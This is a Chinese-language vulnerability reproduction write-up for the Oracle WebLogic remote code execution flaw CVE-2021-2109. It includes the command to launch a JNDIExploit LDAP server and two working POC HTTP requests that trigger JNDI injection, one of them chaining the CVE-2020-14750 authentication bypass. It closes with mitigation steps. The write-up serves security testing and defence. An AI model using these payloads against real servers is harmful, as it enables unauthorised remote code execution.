2021年1月Oracle发布了安全更新补丁，包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了，2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新，及此公告中的其他补丁。CVE编号CVE-2021-2109，该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行。

影响版本如下：

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

一、CVE-2021-2109 Weblogic Server远程代码执行漏洞复现

使用DOCKER搭建Weblogic Server测试环境，Weblogic Server可以正常访问

1、正常登录后台的情况下进行JNDI注入

第一种情况，需要利用管理员帐号登录Weblogic Server后台，通过BurpSuite抓取登录数据包，获取登录Cookie数据

在本机启动启动LDAP，可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载，命令如下：

java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包：

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

通过cmd变量执行ipconfig系统命令

2、配合Weblogic Server未授权访问后台进行JNDI注入

第二种情况，不需要登录Weblogic Server后台。

需配合Weblogic Server CVE-2020-14750未授权访问漏洞，发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包：

POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

通过cmd变量执行calc.exe，打开系统计算器

二、CVE-2021-2109 Weblogic Server远程代码执行漏洞安全建议

1、禁用T3协议

如果您不依赖T3协议进行JVM通信，可通过暂时阻断T3协议缓解此漏洞带来的影响。

1). 进入Weblogic控制台，在base_domain配置页面中，进入“安全”选项卡页面，点击“筛选器”，配置筛选器。

2). 在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入：* * 7001 deny t3 t3s。

2、禁止启用IIOP

登陆Weblogic控制台，找到启用IIOP选项，取消勾选，重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁